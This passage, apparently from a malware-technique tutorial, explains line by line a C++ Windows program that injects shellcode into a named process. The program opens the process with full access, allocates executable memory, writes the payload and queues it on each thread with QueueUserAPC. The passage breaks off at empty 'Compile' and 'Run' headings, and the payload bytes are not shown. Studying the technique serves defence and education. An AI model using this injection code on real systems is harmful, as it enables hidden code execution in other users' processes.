    • A list of thread IDs (tids)

pid = findMyProc(argv[1]);
  • Calls a function findMyProc() which takes the process name (like notepad.exe) and returns its Process ID (PID).

if (pid == 0) {
    printf("PID not found :( exiting...\n");
    return -1;
}
  • If no PID is found, print an error and exit with code -1.

else {
    printf("PID = %d\n", pid);
  • Print the found PID.

    ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
    if (ph == NULL) {
        printf("OpenProcess failed! exiting...\n");
        return -2;
    }
  • Open the target process with all permissions.
  • If that fails (e.g., access denied), print error and exit.

    rb = VirtualAllocEx(ph, NULL,
        my_payload_len,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);
  • Allocates a memory buffer inside the target process, with read/write/execute permissions.
  • my_payload_len is the size of the shellcode.
  • rb holds the address of the allocated memory.

    WriteProcessMemory(ph, rb,
        my_payload,
        my_payload_len, NULL);
  • Writes the malicious payload (probably calc.exe shellcode) into the allocated memory of the remote process.

    if (getTids(pid, tids)) {
        for (DWORD tid : tids) {
            HANDLE ht = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
            if (ht) {
                QueueUserAPC((PAPCFUNC)rb, ht, 0);
                printf("payload injected via QueueUserAPC\n");
                CloseHandle(ht);
            }
        }
    }
  • Calls a function getTids() to get all thread IDs from that process.
  • Loops through each thread ID:
    • Opens the thread with permission to set context.
    • Injects the payload using QueueUserAPC().
      • This schedules the shellcode to be executed when the thread enters an alertable state (e.g., waits on SleepEx() or WaitForSingleObjectEx()).
    • Closes the thread handle afterward.

    CloseHandle(ph);
}
return 0;
  • Closes the handle to the process and exits normally.

Compile

Run